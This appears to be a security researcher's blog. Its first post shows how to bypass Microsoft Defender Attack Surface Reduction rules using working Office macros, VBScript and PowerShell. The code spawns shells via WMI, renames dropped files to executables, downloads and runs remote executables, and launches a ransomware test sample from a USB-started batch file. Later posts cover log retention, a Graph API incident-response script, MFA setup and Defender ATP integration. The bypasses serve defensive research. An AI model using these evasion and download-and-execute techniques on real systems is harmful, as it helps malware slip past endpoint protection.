Author: thalpius

Microsoft Defender Antivirus Exploit Guard is a set of intrusion prevention capabilities that includes Attack Surface Reduction Rules. The Attack Surface Reduction rules are rules to lock down various attack vectors commonly used in malware. In this blog post, I will go through some of the rules and show how to bypass them.

Attack Surface Reduction

Microsoft Defender Antivirus Exploit Guard contains the following four features.

In this blog post, I will zoom in on Attack Surface Reduction.

This table shows all Attack Surface Reduction rules and their corresponding GUIDs, which you use to configure the rules using Group Policies or PowerShell. Other methods to enable the Attack Surface Reduction rules are Microsoft Intune, Mobile Device Management, and Microsoft Endpoint Configuration Manager.

Each Attack Surface Reduction rule contains the following three settings.

• Not configured: Disable the ASR rule
• Block: Enable the ASR rule
• Audit: Evaluate how the ASR rule would impact your organization if enabled

When the rule applies in audit mode, an event is created in the Event Viewer but does not block any code. If the rule applies in block mode, it stops executing the code, makes an event in the Event Viewer, and Microsoft Defender Antivirus shows an alert that Attack Surface Reduction blocked the attack vector.

There is a Microsoft link that contains some Attack Surface Reduction examples, which you can download. There is a total of six samples I used to test the Attack Surface Reduction rules.

Block Office applications from creating child processes

Let us take a look at the first example. Here is the description of the rule from Microsoft.

“This rule blocks Office apps from creating child processes. This includes Word, Excel, PowerPoint, OneNote, and Access.

Creating malicious child processes is a common malware strategy. Malware that abuse Office as a vector often run VBA macros and exploit code to download and attempt to run additional payloads. However, some legitimate line-of-business applications might also generate child processes for benign purposes, such as spawning a command prompt or using PowerShell to configure registry settings.”

First, we open the file with no rules configured. If you open the file and click “Enable Content,” a macro will run, and a Command Prompt appears.

Here is the macro from the example.

Public Sub Document_Open()
 Shell "cmd.exe", vbNormalFocus
 End Sub
 Private Sub Document_Close()
     On Error GoTo ErrorHandler
     Set WshShell = CreateObject("WScript.Shell")
     WshShell.RegDelete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security\Trusted Documents\TrustRecords\"
 ErrorHandler:
 End Sub

The macro uses the Windows Script Host Object to start a Command Prompt. The rule states that Office Applications is blocked to create child processes. What if we use the macro to talk to, for example, WMI and let WMI start a child process? First, I enabled the Attack Surface Reduction rule and ran the same file to see if the macro gets blocked by Attack Surface Reduction.

The Attack Surface Reduction rule has blocked the macro from creating a child process. I used the following code to let WMI start a child process.

Public Sub Document_Open()
  Const HIDDEN_WINDOW = 1
  strComputer = "."
  Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
  Set objStartup = objWMIService.Get("Win32_ProcessStartup")
  Set objConfig = objStartup.SpawnInstance_
  objConfig.ShowWindow = HIDDEN_WINDOW
  Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
  errReturn = objProcess.Create("cmd.exe", Null, objConfig, intProcessID)
End Sub

If you use the code above and open the document, you will see the macro starts a Command Prompt just fine.

As you can see, this works just fine with the Attack Surface Reduction rule enabled. However, there is another rule which blocks process, if enabled, creation originating from WMI commands. Continue reading to see how to bypass that rule as well.

Block Office applications from creating executable content

Let us take a look at the second example. Here is the description of the rule from Microsoft.

“This rule prevents Office apps, including Word, Excel, and PowerPoint, from creating potentially malicious executable content, by blocking malicious code from being written to disk.

Malware that abuses Office as a vector may attempt to break out of Office and save malicious components to disk. These malicious components would survive a computer reboot and persist on the system. Therefore, this rule defends against a common persistence technique.”

The example drops an executable on disk, runs it, and encrypts all files in the c:\demo folder if the rule is not enabled or set to audit mode.

I used the following code to drop an executable on disk.

Sub Auto_Open()
  Dim fso As Object
  Set fso = CreateObject("Scripting.FileSystemObject")
  Dim Fileout As Object
  Set Fileout = fso.CreateTextFile("C:\temp\thalpius.exe", True, True)
  Fileout.Write "your string goes here"
  Fileout.Close
End Sub

With the rule enabled, it indeed gets blocked.

I was wondering what would happen if you create a non-executable file.

Sub Auto_Open()
  Dim fso As Object
  Set fso = CreateObject("Scripting.FileSystemObject")
  Dim Fileout As Object
  Set Fileout = fso.CreateTextFile("C:\temp\thalpius.lol", True, True)
  Fileout.Write "your string goes here"
  Fileout.Close
End Sub

Interestingly enough, this works just fine.

So what if you create a non-executable file first and change the extension to an executable file? You can drop a non-executable file and rename it to an executable file using the following code.

Sub Auto_Open()
  Dim fso As Object
  Set fso = CreateObject("Scripting.FileSystemObject")
  Dim Fileout As Object
  Set Fileout = fso.CreateTextFile("C:\temp\thalpius.txt", True, True)
  Fileout.Write "your string goes here"
  Fileout.Close
  Name "C:\temp\thalpius.txt" As "C:\temp\thalpius.exe"
End Sub

Now we run the macro above and see what happens.

As you can see, this works just fine, and you bypass the Attack Surface Reduction rule.

Block JavaScript or VBScript from launching downloaded executable content

Let us take a look at the third example. Here is the description of the rule from Microsoft.

“This rule prevents scripts from launching potentially malicious downloaded content. Malware written in JavaScript or VBScript often acts as a downloader to fetch and launch other malware from the Internet.

Although not common, line-of-business applications sometimes use scripts to download and launch installers.”

The following code is an example from Microsoft.

// SCPT:xmlHttpRequest
var xmlHttp = WScript.CreateObject("MSXML2.XMLHTTP");
xmlHttp.open("GET", "https://www.bing.com", false);
xmlHttp.send();
// SCPT:JSRunsFile
var shell = WScript.CreateObject("WScript.Shell");
shell.Run("notepad.exe");

So I have created a Visual Basic Script which downloads a file and executes it.

Dim objShell
Dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", "https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe", False
xHttp.Send
with bStrm
    .type = 1
    .open
    .write xHttp.responseBody
    .savetofile "c:\temp\putty.exe", 2
end with
Set objShell = WScript.CreateObject( "WScript.Shell" )
objShell.Exec("c:\temp\putty.exe")

Although, to my surprise, it runs just fine even with the rule enabled.

I created a macro as well since it uses the scripting engine by Windows, but that works just fine as well.

Sub DownloadFile()
  Dim myURL As String
  myURL = "https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe"
  Dim WinHttpReq As Object
  Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
  WinHttpReq.Open "GET", myURL, False, "username", "password"
  WinHttpReq.send
  If WinHttpReq.Status = 200 Then
    Set oStream = CreateObject("ADODB.Stream")
    oStream.Open
    oStream.Type = 1
    oStream.Write WinHttpReq.responseBody
    oStream.SaveToFile "C:\temp\putty.exe", 2 ' 1 = no overwrite, 2 = overwrite
    oStream.Close
  End If
End Sub
Sub Auto_Open()
  DownloadFile
  CreateObject("WScript.Shell").Run "c:\temp\putty.exe", 1
End Sub

I have no idea why this code is not blocked, but it seems that this bypasses the Attack Surface Reduction rule.

Block Process Creations originating from PSExec & WMI commands

Let us take a look at the fourth example. Here is the description of the rule from Microsoft.

“This rule blocks processes created through PsExec and WMI from running. Both PsExec and WMI can remotely execute code, so there is a risk of malware abusing this functionality for command and control purposes, or to spread an infection throughout an organization’s network.”

If you start the Visual Basic Script, it starts notepad.

With the rule enabled, it does block the example script as intended.

The PowerShell cmdlet “Register-ScheduledTask” uses Windows Management Instruments (WMI) to create a scheduled task. I was wondering if this gets blocked as well.

$A = New-ScheduledTaskAction -Execute "cmd.exe"
$T = New-ScheduledTaskTrigger -once -At 5:25pm
$S = New-ScheduledTaskSettingsSet
$D = New-ScheduledTask -Action $A -Trigger $T -Settings $S
Register-ScheduledTask Evil -InputObject $D

Creating a scheduled task using the code above bypasses the Attack Surface Reduction rule. There is an event in the WMI Event Viewer, but the scheduled task still runs just fine.

Block untrusted and unsigned processes that run from USB

Let us take a look at the fifth example. Here is the description of the rule from Microsoft.

“With this rule, admins can prevent unsigned or untrusted executable files from running from USB removable drives, including SD cards. Blocked file types include executable files (such as .exe, .dll, or .scr)”

If you run the executable from a USB drive, it will encrypt files in the c:\demo folder and show a popup with a message that your files are encrypted.

I copied the file to a USB drive and enabled the rule to be sure the rule works. Surely it does.

I wondered what would happen if I copy the same file to a fixed disk and run it from there using the following code.

xcopy /s UNSIGNED_ransomware_test_exe.exe %temp% /y
start %temp%\UNSIGNED_ransomware_test_exe.exe

When you save the code above as a .bat file and run the file from a USB disk, the executable runs just fine.

It should not be too hard to embed an executable in a batch file to start from a USB drive to bypass this Attack Surface Reduction rule.

Conclusion

Although Exploit Guard Attack Surface Reduction rules work great with Microsoft Defender Antivirus, the alerts stay on the endpoint. To send the events to a centralized dashboard for advanced monitoring, you need to implement a Security Information and Event Management (SIEM) solution like Microsoft Sentinel or use Microsoft Defender for Endpoint.

I did not look at all Attack Surface Reduction rules, but it is relatively easy to bypass those rules. Although an attacker can not make any mistake or the attacker will get detected. Especially if you are using Microsoft Defender for Endpoint as the alerts show up in a centralized cloud portal and detect any anomalies. Bypassing the Attack Surface Reduction rules alone is not enough for an attacker to execute malicious code, and an attacker hopefully will get caught when moving laterally. Either monitoring the events in the Event Viewer using a SIEM solution or use Microsoft Defender for Endpoint is critical, though.

For most Microsoft products, data retention is 30 days. However, it depends on some products if you use the free or paid version of the product, and some products do not allow you to change to the retention period at all. To get a clear overview, I created a table with the most common Microsoft products with their retention period.

Microsoft Log Retention

Conclusion

Not all products allow you to change the retention period, and some products come with an additional cost when changing the retention period. However, this is not always the case. When a Log Analytics Workspace is attached to Sentinel, data retention if free for 90 days.

Suppose you want to extend the retention period longer than the maximum period. In that case, you need to send the logs to a Security Information and Event Management (SIEM) solution or send it to an Azure Log Analytics workspace if the product supports it.

During an incident, you want to do your analysis as quickly and as precisely as possible. Although there are many scripts available to do proper research within Microsoft 365, if you are working with Exchange Online, OneDrive, SharePoint, they all need separate modules. Not to mention that Exchange Online sometimes need multiple modules depending on what data you want to extract. Using numerous modules can be a pain due to numerous logins that are required.

I wanted to create a ‘One ring to rule them all’ for any incident response within Microsoft 365, which is Operating System independent, runs natively on Windows, and works with or without Multi-Factor Authentication. PowerShell runs on Linux, macOS, natively on Windows, and it happens to be a language I somewhat understand.

Since many Microsoft security products and services connect to the Microsoft Graph Security API, I have chosen to use PowerShell in combination with the Microsoft Graph Security API.

App Registration

To communicate to the Microsoft Graph Security API, you need an app registration. If you create an app registration, be sure you select the Microsoft graph and Application Permissions.

Note: During the application registration, write down the application ID, the client secret, and the tenant name.

Add the following API permissions.

    Directory.Read.All
    Directory.ReadWrite.All
    IdentityRiskyUser.Read.All
    Policy.Read.All
    SecurityEvents.Read.All
    DelegatedPermissionGrant.ReadWrite.All
    AuditLog.Read.All
    Mail.Read
    MailboxSettings.Read

Research Questions

The idea of answering a research question is to run a function, export the outcome to a JSON file, and filter the JSON file if needed. The sign-in logs, for example, contain a lot of information. Using your favorite tool, you can extract what research question you would like to answer. The export includes the location of the login. A simple query makes it possible to filter all logins outside the company’s country to get an overview of potential malicious logins.

RR-GetAccessToken

The first thing you need to do is getting a token using the app registration you created previously.

RR-GetAccessToken -appId 'XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX' -appSecret 'XXXXXXXX' -tenantName "thalpius.onmicrosoft.com"

Once you have a token, you can use the functions described below.

Note: The token expires in one hour. I have not had this issue myself that a function runs more than an hour, but I am looking to add a refresh token to the script. You can always request a new token described above, which is valid for another hour.

RR-GetSkus

The first thing to look for is licenses. If the tenant contains an Office 365 Advanced Threat Protection license, it helps during the investigation. Or if the tenant contains an Azure AD Premium license, you know the logs in Azure AD go back one month instead of seven days.

I recommend starting with an output of the licenses to see what tools can help during the investigation.

RR-GetSkus

RR-GetAcceptedDomains

Accepted domains are used in the tenant to sent and receive e-mail. The function RR-GetAcceptedDomains can extract all accepted domains within the tenant.

Getting all accepted domains is helpful to validate which domain names accept e-mail within the tenant.

RR-GetAcceptedDomains

RR-GetInboxRules

Many attackers create inbox rules for persistence or hiding footprints. With the function RR-GetInboxRules you can export all inbox rules within the tenant or for a particular user.

RR-GetInboxRules
RR-GetInboxRules -userPrincipalName user@thalpius.com

RR-GetSignins

The RR-GetSignins functions export all Azure AD sign-ins within the tenant or for a particular user. The sign-in logs contain a lot of information like the user-agent, location of the sign-in, etc.

RR-GetSignins
RR-GetSignins -userPrincipalName user@thalpius.com

RR-GetAuditLogs

The RR-GetAuditLogs functions export all Azure AD audit logs within the tenant or for a particular user.

RR-GetAuditLogs
RR-GetAuditLogs -userPrincipalName user@thalpius.com

RR-GetEmailBySubject

The function RR-GetEmailBySubject searches for any e-mail with a given subject.

RR-GetEmailBySubject -subject "thalpius"

RR-GetEmailByBody

The function RR-GetEmailByBody searches for any e-mail with a given keyword in the body of the e-mail.

RR-GetEmailByBody -bodyKeyword "thalpius"

RR-GetAttachment

This function gives you the ability to extract all usernames with a given attachment filename in their mailbox.

RR-GetAttachment -fileName "thalpius.zip"

RR-GetAttachments

This function gives you the ability to extract attachments to check if it is malicious. It exports all attachments from a user’s mailbox or extracts the attachment itself if you use the attachmentId. The attachment is Base64 encoded. Decode the encoded string in the output to get the binary.

RR-GetAttachments -userPrincipalName user@thalpius.com
RR-GetAttachments -userPrincipalName user@thalpius.com -extension ".zip"
RR-GetAttachments -userPrincipalName user@thalpius.com -attachmentId XXXX-XXXXXX-XXXX

RR-GetAllAppRegistrations

In an illicit consent grant attack, the attacker creates an Azure-registered application that requests access to data such as contact information and e-mail. This function exports all app registrations within the tenant, including the owner.

RR-GetAllAppRegistrations

RR-OutputArray

Every function adds the data to an array. Once you are done running all functions you think you need, RR-OutputArray creates a JSON file with all data. You can filter the data if needed using your favorite scripting language.

RR-OutputArray -outputLocation 'c:\users\thalpius\incidentResponse\output.json'

Conclusion

Check out the script on my GitHub page. If you are missing any research questions, please let me know or add a GitHub issue and I will do my best to add it to the script.

Note: Do not forget to remove the Microsoft Graph Security API permissions once the investigation is completed.

There are multiple ways to enable Multi-Factor Authentication (MFA) within Microsoft Office 365. This blog post will describe the various technical implementations of Multi-Factor Authentication, including the best-practice to implement it.

Azure AD MFA Per User

There are three Multi-Factor Authentication statuses within Microsoft Office 365: Enabled, Enforced, and Disabled. The status Enabled indicates that Multi-Factor Authentication is enabled, but the user did not go through the Multi-Factor Authentication registration yet. When the user goes through the Multi-Factor Authentication registration, the status changes to Enforced. Disabled means that Multi-Factor Authentication is not enabled, and the user does not have to log in with a Multi-Factor.

The risk by enabling Multi-Factor Authentication on a user-basis is misconfiguration since Multi-Factor Authentication is not enabled by default when creating a new user account. An administrator can forget enabling Multi-Factor Authentication, which increases the risk of a successful password attack due to missing Multi-Factor Authentication.

Azure AD MFA via Conditional Access

Conditional Access policies at their simplest are if-then statements; if a user wants to access a resource, then they must complete an action. An action can be Multi-Factor Authentication. With Conditional Access, you force every user to use Multi-Factor Authentication when logging into Microsoft Office 365. Using Conditional Access, the risk of misconfiguration lowers since every user applies to the Conditional Access when logging in, and its the best-practice to enable Multi-Factor Authentication.

Note: Azure AD Conditional Access is part of the Azure AD Premium licensing model. So additional costs are required.

Azure AD Named Locations

You can add trusted IP address ranges within Azure AD as Named Locations. A policy can then exclude the Named Locations. Using an exclusion can prevent an identity from being challenged with Multi-Factor Authentication if it comes from a trusted location.

Azure AD Identity Protection MFA Registration Policy

The advantage of using the Multi-Factor Authentication policy within Azure AD Identity Protection is that users have 14 days to complete the registration. During these 14 days, they can bypass registration, but they have to register before they can complete the sign-in process at the end of the period. Once the sign-in process is complete, the user can log in without Multi-Factor Authentication. The policy only forces a user to register Multi-Factor Authentication. The Azure AD Identity protection policy is unnecessary when Multi-Factor Authentication is enforced using Conditional Access.

Note: Azure AD Identity Protection is part of the Azure AD Premium licensing model. So additional costs are required.

Azure AD Security Defaults

If you do not have an Azure AD Premium license or do not want to buy any additional license, Azure AD Security Defaults is a good alternative.

Enabling this option configures your organization with the following settings:

• Requiring all users to register for Azure Multi-Factor Authentication;
• Requiring administrators to perform multi-factor authentication;
• Blocking legacy authentication protocols;
• Requiring users to perform multi-factor authentication when necessary;
• Protecting privileged activities like access to the Azure portal.

Note: Azure AD Security Defaults are not suitable for complex security requirements. It is either turned on or turned off. If you want to make decisions based on a condition, Conditional Access is the way to go.

Legacy Authentication

Microsoft Azure Active Directory supports several authentication and authorization protocols, including legacy authentication. Legacy authentication includes Exchange ActiveSync, SMTP, Autodiscover, Exchange Web Services, POP3, IMAP4, and many more.

The problem is, legacy authentication does not support Multi-Factor Authentication!

According to Microsoft, more than 99 percent of password spray attacks use legacy authentication protocols. It is crucial to disable legacy authentication when using Multi-Factor Authentication or in any situation.

You can use the Azure portal to identify the usage of legacy authentication within your environment before disabling it.

1. Navigate to; Azure portal > Azure Active Directory > Sign-ins.
2. Add the Client App column if it is not shown by clicking on; Columns > Client App.
3. Add filters > Client App > select all of the legacy authentication protocols. Select outside the filtering dialog box to apply your selections and close the dialog box.

Note: Conditional Access in Report-only mode is another way to identify legacy authentication within your environment.

Conclusion

According to Microsoft, using Multi-Factor Authentication reduces 99,9% of the attacks within Microsoft Office 365. Using Multi-Factor Authentication does not mean your company is safe for password attacks. It would not be the first time a user accepts a Multi-Factor Authentication challenge on their device when an attacker logs-in within Microsoft Office 365 with leaked credentials. So adoption and education for company users are critical. Enabling Multi-Factor Authentication and disabling legacy authentication is a minimum security measure every organization should take.

Microsoft Defender ATP is a fantastic product on its own and becomes even more impressive when integration between other Microsoft products takes place. This blog post will explain the advantages of integration with Microsoft Defender ATP and how the products complement each other.

Microsoft Defender ATP and Microsoft Office 365 ATP

Through threat intelligence sharing, a malicious attachment identified in Microsoft Office 365 ATP will be identified as malicious in Microsoft Defender ATP as well to block the same malicious file at the endpoint. A file downloaded using a different channel is blocked automatically on the endpoint due to integration between Microsoft Defender ATP and Microsoft Office 365 ATP.

Another advantage of the integration between Microsoft Defender ATP and Microsoft Office 365 ATP is an overview of devices shown that potentially could have been affected by a detected malicious e-mail message. The summary includes how many recent alerts those devices have in Microsoft Defender ATP.

The integration needs to be enabled in Microsoft Office 365 ATP and within Microsoft Defender ATP.

Note: Your organization must have Office 365 ATP Plan 2 and Microsoft Defender ATP.

Microsoft Defender ATP and Microsoft Azure ATP

A simple but powerful integration between Microsoft Defender ATP and Microsoft Azure ATP is the alerts shared between the two products.

The Microsoft Azure ATP portal shows Microsoft Defender ATP alerts, and the Microsoft Defender ATP portal shows Microsoft Azure ATP alerts.

The integration needs to be enabled in Microsoft Azure ATP and within Microsoft Defender ATP.

Microsoft Defender ATP and Azure AD Conditional Access

Microsoft Intune supports the integration between Microsoft Defender ATP and Azure AD Conditional Access.

If a device is non-compliant due to a Microsoft Intune policy, Conditional Access can block the device from accessing company data.

Microsoft Defender ATP and Azure Security Center

The integration between Microsoft Defender ATP and Azure Security Center Standard Tier automatically enables the Microsoft Defender ATP sensor for Windows Server 2008 R2 SP1, Windows Server 2012 R2, and Windows Server 2016 monitored by Azure Security Center. Windows Server is automatically on-boarded with integration enabled.

Alerts in Microsoft Defender ATP are shown in the Azure Security Center as well.

To integrate Microsoft Defender ATP with Azure Security Center, use the following option.

Microsoft Defender ATP and Skype for Business

A minor but helpful benefit of Skype for Business integration with Microsoft Defender ATP is a one-click communication with the user.

To integrate Microsoft Skype for Business with Microsoft Defender ATP, use the following option.

Microsoft Defender ATP and Microsoft Threat Protection

Microsoft Threat Protections and various Microsoft security solutions natively integrate Microsoft Defender ATP and other Microsoft security solutions. More on Microsoft Threat Protection in a future blog post.

Conclusion

This blog post is about integration with Microsoft Defender ATP alone. Integration with Microsoft Defender ATP has many benefits, as shown in this blog post. Imagine data correlation and integration between all Microsoft products.